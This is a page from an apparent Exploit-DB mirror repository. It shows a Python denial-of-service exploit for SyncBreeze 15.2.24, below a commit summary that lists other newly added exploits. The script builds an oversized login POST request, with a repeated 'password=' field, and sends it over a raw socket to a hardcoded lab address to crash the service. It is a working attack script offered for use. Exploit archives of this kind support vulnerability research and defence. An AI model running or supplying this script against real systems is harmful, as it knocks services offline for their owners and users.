bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/51725.py
Exploit-DB cbe784b087 DB: 2023-09-09 
16 changes to exploits/shellcodes/ghdb

Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities

Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS

Drupal 10.1.2 - web-cache-poisoning-External-service-interaction

Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure

soosyze 2.0.0 - File Upload

SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection

Wordpress Plugin Elementor 3.5.5 - Iframe Injection

Wp2Fac - OS Command Injection

Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)

SyncBreeze 15.2.24 - 'login' Denial of Service

GOM Player 2.3.90.5360 - Buffer Overflow (PoC)

GOM Player 2.3.90.5360 - Remote Code Execution (RCE)

Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
2023-09-09 00:16:33 +00:00

35 lines
No EOL
1.2 KiB
Python
Executable file
Raw Blame History

# Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service
# Date: 30/08/2023
# Exploit Author: mohamed youssef
# Vendor Homepage: https://www.syncbreeze.com/
# Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe
# Version: 15.2.24
# Tested on: windows 10 64-bit
import socket
import time
pyload="username=admin&password="+'password='*500+""
request=""
request+="POST /login HTTP/1.1\r\n"
request+="Host: 192.168.217.135\r\n"
request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"
request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
request+="Accept-Language: en-US,en;q=0.5\r\n"
request+="Accept-Encoding: gzip, deflate\r\n"
request+="Content-Type: application/x-www-form-urlencoded\r\n"
request+="Content-Length: "+str(len(pyload))+"\r\n"
request+="Origin: http://192.168.217.135\r\n"
request+="Connection: keep-alive\r\n"
request+="Referer: http://192.168.217.135/login\r\n"
request+="Upgrade-Insecure-Requests: 1\r\n"
request+="\r\n"
request+=pyload
print (request)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.217.135",80))
s.send(request.encode())
print (s.recv(1024))
s.close()
time.sleep(5)
Reference in a new issue View git blame Copy permalink